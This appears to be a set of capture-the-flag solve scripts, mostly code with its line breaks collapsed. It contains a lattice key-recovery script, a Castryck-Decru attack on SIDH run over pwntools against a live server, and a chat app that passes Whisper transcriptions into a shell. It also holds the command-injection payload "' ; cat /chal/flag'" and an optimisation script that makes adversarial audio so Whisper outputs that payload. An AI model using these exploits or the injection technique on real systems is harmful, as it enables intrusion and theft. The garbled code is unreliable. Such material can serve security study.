    L[0, 3+nums*5+i] = Ai1    L[1, 3+nums*5+i] = Ai2    L[2, 3+nums*5+i] = Bi    for j in range(5):        L[3+5*i+j, 3+nums*5+i] = -2^exps[j]        L[-i-1, -i-1] = nfor i in range(3+5*nums):    L[i, i] = 1
Q1 = diagonal_matrix(ZZ, [2^107, 2^107, 1] + [2^29, 2^68, 2^31, 2^23, 2^23]*nums + [2^31]*nums)Q2 = diagonal_matrix(ZZ, [2^107]*(2+nums*6+1))Q = Matrix(ZZ, Q2 / Q1)L = L * QL = L.BKZ(block_size=20)#L = L.LLL()L = L / Qres = list(map(int, L[0]))d = res[0]*2^20 + (res[1]+2^107)*2^(128+20) + d_res = list(map(abs, L[0]))print(res)print(d)d = d_ + res[0]*2^20 + res[1]*2^148

c = bytes.fromhex(enc_flag["ciphertext"])iv = bytes.fromhex(enc_flag["iv"])
sha2 = sha256()sha2.update(str(d).encode('ascii'))key = sha2.digest()[:16]cipher = AES.new(key, AES.MODE_CBC, iv)flag = cipher.decrypt(c)
print(flag)
#bi0sCTF{p4rry_7h15_y0u_f1l7hy_w4r_m4ch1n3}

e2, e3 = 216, 137p = 2**e2 * 3**e3 - 1F.<i> = GF(p**2, modulus=x^2+1)E0 = EllipticCurve(F, [0,6,0,1,0])
def generate_torsshn_basis(E, l, e, cofactor):    while True:        P = cofactor * E.random_point()        if (l^(e-1)) * P != 0:             break    while True:        Q = cofactor * E.random_point()        if (l^(e-1)) * Q != 0and P.weil_pairing(Q, l^e) != 1:            break    return P, Q
def comp_iso(E, Ss, ℓ, e):    φ,  E1 = None, E    for k in range(e):        R = [ℓ**(e-k-1) * S for S in Ss]        ϕk = E1.isogeny(kernel=R)        Ss = [ϕk(S) for S in Ss]        E1 = ϕk.codomain()        φ  = ϕk if φ is None else ϕk * φ    return φ, E1
def j_ex(E, sk, pk, ℓ, e):    φ, _ = comp_iso(E, [pk[0] + sk*pk[1]], ℓ, e)    return φ.codomain().j_invariant()

########################################################################### get datafrom pwn import remote, context
context.log_level = "critical"sh = remote("13.233.255.238", 4004)
def _get_infos(sh):    sh.recvuntil(b'PA:')    PA = eval(sh.recvline().strip())    sh.recvuntil(b'QA:')    QA = eval(sh.recvline().strip())    sh.recvuntil(b'PB:')    PB = eval(sh.recvline().strip())    sh.recvuntil(b'QB:')    QB = eval(sh.recvline().strip())     sh.recvuntil(b'EA invariants:')    EA = eval(sh.recvline().strip())     sh.recvuntil('φAPB:'.encode())    φAPB = eval(sh.recvline().strip())    sh.recvuntil('φAQB:'.encode())    φAQB = eval(sh.recvline().strip())    sh.recvuntil('φAPA:'.encode())    φAPA = eval(sh.recvline().strip())    sh.recvuntil('φAQA:'.encode())    φAQA = eval(sh.recvline().strip())    sh.recvuntil(b'EB invariants:')    EB = eval(sh.recvline().strip())    sh.recvuntil('φBPA:'.encode())    φBPA = eval(sh.recvline().strip())    sh.recvuntil('φBQA:'.encode())    φBQA = eval(sh.recvline().strip())    sh.recvuntil(b'IV1:')    iv1 = bytes.fromhex(sh.recvline().strip().decode())    sh.recvuntil(b'CT1:')    ct1 = bytes.fromhex(sh.recvline().strip().decode())    sh.recvuntil(b'IV2:')    iv2 = bytes.fromhex(sh.recvline().strip().decode())    sh.recvuntil(b'CT2:')    ct2 = bytes.fromhex(sh.recvline().strip().decode())    return (PA, PB, QA, QB, EA, φAPB, φAQB, φAPA, φAQA, EB, φBPA, φBQA, iv1, ct1, iv2, ct2)
PA, PB, QA, QB, EA, φAPB, φAQB, φAPA, φAQA, EB, φBPA, φBQA, iv1, ct1, iv2, ct2 = _get_infos(sh)EA = EllipticCurve(F, EA)EB = EllipticCurve(F, EB)PA = E0(PA[0], PA[1])PB = E0(PB[0], PB[1])QA = E0(QA[0], QA[1])QB = E0(QB[0], QB[1])φAPB = EA(φAPB[0], φAPB[1])φAQB = EA(φAQB[0], φAQB[1])φAPA = EA(φAPA[0], φAPA[1])φAQA = EA(φAQA[0], φAQA[1])φBPA = EB(φBPA[0], φBPA[1])φBQA = EB(φBQA[0], φBQA[1])

########################################################################### part1from Crypto.Cipher import AESimport hashlib
kA = (-φAPA).log(φAQA)j1 = j_ex(E0, kA, (PB,QB), 3, e3)k1 = str(j1).encode()c  = AES.new(hashlib.sha256(k1).digest()[:16], AES.MODE_CBC, iv1)flag1 = c.decrypt(ct1)
#bi0s{D3c0y_Fl4g}

########################################################################### part2def senddata(As, R, S):    a1,a2,a3,a4,a6 = As    Rx, Ry = R.xy()    Sx, Sy = S.xy()
    sh.sendline(str(a1).encode())    sh.sendline(b"0")    sh.sendline(str(a2).encode())    sh.sendline(b"0")    sh.sendline(str(a3).encode())    sh.sendline(b"0")    sh.sendline(str(a4).encode())    sh.sendline(b"0")    sh.sendline(str(a6).encode())    sh.sendline(b"0")
    sh.sendline(str(Rx[0]).encode())    sh.sendline(str(Rx[1]).encode())    sh.sendline(str(Ry[0]).encode())    sh.sendline(str(Ry[1]).encode())
    sh.sendline(str(Sx[0]).encode())    sh.sendline(str(Sx[1]).encode())    sh.sendline(str(Sy[0]).encode())    sh.sendline(str(Sy[1]).encode())
for i in range(1):    senddata([0,6,0,1,0], PB, 2^e2*QB)    sh.recvuntil(b"IV? ")    sh.sendline(iv1.hex().encode())    sh.recvuntil(b"CT? ")    sh.sendline(ct1.hex().encode())    print(sh.recvline())

from Crypto.Util.number import *
phiA = E0.isogeny(PA+kA*QA, algorithm="factored")kA = int(kA)t = PB.weil_pairing(QB, 3^e3)^(2^e2)R = φAPB + kA*φAQBS = φAQB
print(R*3^(e3-1))print(S*3^(e3-1))print()print(R.weil_pairing(S, 3^e3))print(t)print()print(R.weil_pairing(S, 3^e3))print(S.weil_pairing(R, 3^e3))

cd Castryck-Decru-SageMath

print(EB.a4())print(EB.a6())

import public_values_auxfrom public_values_aux import *
load('castryck_decru_shortcut.sage')
# Set the prime, finite fields and starting curve# with known endomorphisma = 216b = 137p = 2^a*3^b - 1
Fp2.<i> = GF(p^2, modulus=x^2+1)
E_start = EllipticCurve(Fp2, [0,6,0,1,0])E_start.set_order((p+1)^2) # Speeds things up in Sage
# Generation of the endomorphism 2itwo_i = generate_distortion_map(E_start)
P = (20690403536392600078465656902710363117843247569466482645756663793753891298992211729087027856554169508141272578660842094566655403137*i + 16313433142637367692941430599385014493404794403854859854624205369306396917751115446704244406178629747993507907228260477430638842437, 13240118368016462653242950463874416865624957755085204302097461557464033306934756775874343949434013431785971080511030152954665862402*i + 17411535874626655815701394530778913744065993420414326942794353796944763296323578071346047073392413629608998374581884523985597354377)Q = (530290421604148520946715544830479351023444842656600324420383346842445912159381995676722023776390850471037541036852294305111366285*i + 7978202182312829844532329844810170240709820010779101661489823493535583930760282790476527690569585555122507806167461738332415098913, 9922991329381138683325080810474010228379415566956892851628961275695942492131088223134795054195201404510987502283068047090361025256*i + 7885084367545037597233039648187059386852394478247750620454059677001953608069991240451954765847561420172509965496419656761187677200)R = (13261153378017697106041503751577798380956883188431296135591915933058432093236066874918736134211069523397226431181641578835836853238*i + 23248101494249896278330811123603802113794850422580749159165472836483445458703775047836103274254018347766425268093967693702451092281, 3101345661822552949952717890191601182832890426998183572449836908532397735613856471343047186206447734077168032391261222249622682952*i + 305344612566459501873620338679870170047869393202371566200323473940269441644720528559856038701922600490585653467313350218170730612)S = (7452048497742668634287348595641254089575576512174819720925569011847695590850703316766765430486619528028227743426727440789865330810*i + 17150498010281396528262267848334546009568339628938964905405951752028488985271343679865260360990549113911411010204267336239355165064, 18642234144947487952387857480395010009139922092084576517645674251833065908792304187628646040711965444040134474013475229083229636569*i + 10492174819244759882470969341652764196312191667726765992091796371720266674517845884620505189554701997905848753024503551180264244994)
P, Q, R, S = map(E_start, (P, Q, R, S))
_phi_dom = EllipticCurve(Fp2, [    0,    6,    0,    (18122192556948301221814159144989245012698418266644753827363944094633027754085427819689040586095693492314207688391207894544072922417*i + 295971526488747107051088633733435681138379590287018721375828742300711170642742254379691464964029797585883155556170625483692068789),    (4320051037787064142025126127083609469727496934356686783898727481014552750412299627658025558254431197695486751787215996779083276555*i + 17361605212809427537704587871472438638342304525240485984893239796611691071089998872533488704749464868644392845805856627129509147334)])_phi_dom.set_order((p+1)**2, num_checks=0)_phi_P = (14738684752814962807194800797694318159529032381678782236634760897186252282789503797467600273775927587387475286539272826003527029282*i + 272328672055623004840998155068789778683534026252648022022754058075704137233383649698095183479894479322384234414398958176519215778, 20298131923383693449505533790926590653708933506785111256562381226779010898198984807924593228995234924398219627655497001433430323059*i + 21000478808521692066527652770372470230350100100283162666533846036044659923118770788633552350843642854059156865830436993637143683785)_phi_Q = (12716877011508353080047258292068980569124019748393862006936548518884440756079905143183128680766867212146328144556876268022953412650*i + 6580286285719406278564766321573004896757200107686910611705139943727897104248398745630902764660435278907037984581466950390221597033, 17912926769273897120965323283827018931613119952811921777692149835506985915321924018429004045147884985547113900697995147668748084024*i + 22519777481694662787566125886243347890924181732739562798486194766287553495654665402685257207721262217261097832521350175541039703395)
_phi_P, _phi_Q = map(_phi_dom, (_phi_P, _phi_Q))
P2, Q2, P3, Q3 = P, Q, R, SEB, PB, QB = _phi_dom, _phi_P, _phi_Q
# ===================================# =====  ATTACK  ====================# ===================================
def RunAttack(num_cores):    return CastryckDecruAttack(E_start, P2, Q2, EB, PB, QB, two_i, num_cores=num_cores)
#recovered_key = SandwichAttack(E_start, P2, Q2, EB, PB, QB, two_i, k=5, alp=0)recovered_key = RunAttack(num_cores=4)

kB = 34420050193779785329914100515143103901626547439989217662246215969
j2 = j_ex(E0, kB, (PA,QA), 2, e2)k2 = str(j2).encode()c  = AES.new(hashlib.sha256(k2).digest()[:16], AES.MODE_CBC, iv2)flag2 = c.decrypt(ct2)print(flag2)

#bi0s{B4by1s0g3ny_J1nv4r14nt_Pwn}

srcchatappapp.py#L134
result = subprocess.run(        [            "python3", "whisper.py", "--model", "tiny.en", audio_file_path,            "--language", "English", "--best_of", "5", "--beam_size", "None"        ],        stdout=subprocess.PIPE,        stderr=subprocess.PIPE,        text=True    )
    # Check for errors    if result.returncode != 0:        return JSONResponse(content={"error": "Error processing audio file."}, status_code=500)
    transcription = result.stdout.strip()    ifnot transcription:        return JSONResponse(content={"error": "No transcription generated."}, status_code=400)
    print("Transcription",transcription)    chatbot_proc = await asyncio.create_subprocess_shell(        f"python3 chatbot.py '{transcription}'",        stdout=asyncio.subprocess.PIPE,        stderr=asyncio.subprocess.STDOUT    )    chatbot_stdout, chatbot_stderr = await chatbot_proc.communicate()    return JSONResponse(content={"response": chatbot_stdout.decode().strip(), "transcription": transcription})

srcwhispertranscribe.py#49-50
deftranscribe(    model: "Whisper",    audio: Union[str, np.ndarray, torch.Tensor],    *,    verbose: Optional[bool] = None,    temperature: Union[float, Tuple[float, ...]] = (0.0, 0.2, 0.4, 0.6, 0.8, 1.0),    compression_ratio_threshold: Optional[float] = 2.4,    logprob_threshold: Optional[float] = -1.0,    no_speech_threshold: Optional[float] = 0.6,    condition_on_previous_text: bool = True,    initial_prompt: Optional[str] = None,    word_timestamps: bool = False,    prepend_punctuations: str = ""'“¿([{-",    append_punctuations: str = ""'.。,，!！?？:：”)]}、",    **decode_options,):

' ; cat /chal/flag'

python3 chatbot.py '' ; cat /chal/flag''

wav_file -> log_mel_spectrogram() -> mel -> pad_or_trim() -> mel_frame -> model.encoder() -> features
token: list -> token[0] = OUTPUT_START -> token[0:i], features -> model.forward() -> token[i] -> if token[i] != OUTPUT_END ? LOOP : BREAK
token -> model.decoder()

import torchfrom whisper import load_modelfrom whisper.audio import log_mel_spectrogram, pad_or_trimfrom whisper.tokenizer import get_tokenizerimport torchaudiofrom torch import nn
DEVICE = "cuda"target_text = "' ; cat /chal/flag'"model = load_model("tiny.en")model.eval()tokenizer = get_tokenizer(    model.is_multilingual,    num_languages=model.num_languages,    language="en",    task="transcribe",)target_tokens = tokenizer.encode(target_text)target_tokens = target_tokens + [50256]
print(target_tokens)
adv = torch.randn(1, 16000*20, device=DEVICE, requires_grad=True)optimizer = torch.optim.Adam([adv], lr=0.01)loss_fn = nn.CrossEntropyLoss()
num_iterations = 50for i in range(num_iterations):    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [SOT, EN]    total_loss = 0    for target_token in target_tokens:        optimizer.zero_grad()
        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)        mel = pad_or_trim(mel, 3000).to(model.device)        audio_features = model.embed_audio(mel)
        logits = model.logits(tokens, audio_features)[:, -1]        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))        total_loss += loss        loss.backward()        optimizer.step()        adv.data = adv.data.clamp(-1, 1)        assert adv.max() <= 1and adv.min() >= -1        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)
    print(tokens.tolist())    print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")
torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)
print("nTranscribing generated adversarial audio:")result = model.transcribe(adv.detach().cpu().squeeze(0))print(f"Transcription: {result['text']}")